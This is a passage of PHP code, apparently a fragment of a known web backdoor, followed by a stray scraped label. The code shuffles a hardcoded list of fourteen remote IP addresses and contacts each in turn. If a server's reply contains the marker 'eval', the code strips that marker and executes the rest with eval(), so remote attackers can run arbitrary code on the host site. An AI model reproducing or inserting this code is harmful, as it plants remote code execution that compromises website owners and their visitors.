           $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4)); 
           } 
          } 
          if (strpos($ult,"eval") !== false){ 
           $z = stripslashes(str_replace("eval","",$ult)); 
           eval($z); 
           exit(); 
          }if (strpos($ult,"ebna") !== false){ 
           $_SERVER["good"] = str_replace("ebna","",$ult);return true; 
          }else {return false;}} 
          $father2[] = "77.81.241.253"; 
          $father2[] = "46.249.58.135"; 
          $father2[] = "176.9.241.150"; 
          $father2[] = "46.37.169.56"; 
          $father2[] = "94.242.255.35"; 
          $father2[] = "178.162.129.223"; 
          $father2[] = "31.184.234.96"; 
          $father2[] = "77.95.18.189"; 
          $father2[] = "93.170.137.22"; 
          $father2[] = "188.40.95.244"; 
          $father2[] = "199.115.231.58"; 
          $father2[] = "82.192.87.178"; 
          $father2[] = "216.246.99.215"; 
          $father2[] = "95.211.18.79"; 
          shuffle($father2); 
          foreach($father2 as $ur){ 
           if (ahfudflfzdhfhs($ur)) { break ;} 
          } 
} 


?> 
相關問題